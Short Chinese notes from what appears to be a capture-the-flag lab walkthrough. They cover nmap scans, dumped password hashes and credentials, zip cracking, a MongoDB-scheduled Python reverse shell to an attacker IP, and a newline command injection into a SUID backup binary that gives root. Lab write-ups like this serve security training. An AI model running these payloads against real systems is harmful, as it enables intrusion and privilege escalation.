一、透過nmap找到30000port
二、登入30000port使用burp查找到用戶帳號密碼並解密
三、下載backup用base64解密及fcrakzip 解開密碼
四、在app.js找到 並用帳密ssh登入mark
五、查看進程有tom用戶的定時任務,找到scheduler
六、登入mongo執行reverse shell
七、查找SUID文件,發現/usr/local/bin/backup
八、透過backup可以提權到root

nmap  -sC -sV   10.129.41.37 -Pn > nmap.txt
nmap  -p- -T5  10.129.41.37 > nmapall.txt

[{"_id":"59a7365b98aa325cc03ee51c"
"username":"myP14ceAdm1nAcc0uNT"
"password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af"  manchester
"is_admin":true}

{"_id":"59a7368398aa325cc03ee51d"
"username":"tom"
"password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240"
"is_admin":false}

{"_id":"59a7368e98aa325cc03ee51e"
"username":"mark"
"password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73"
"is_admin":false}

{"_id":"59aa9781cced6f1d1490fce9"
"username":"rastating"
"password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0"
"is_admin":false}]



/usr/bin/zip -r -P magicword %s %s > /dev/null


然後結果是這樣
"/usr/bin/zip -r -P magicword "   這句成功執行
\n /bin/bash                      這句就是得到root bash
"\n > /dev/null"                  這句就倒讓垃圾桶



zip password:magicword

mongo -u mark -p 5AYRft73VtFpc84k scheduler
db.tasks.insert({"cmd":"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.26\",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")';"})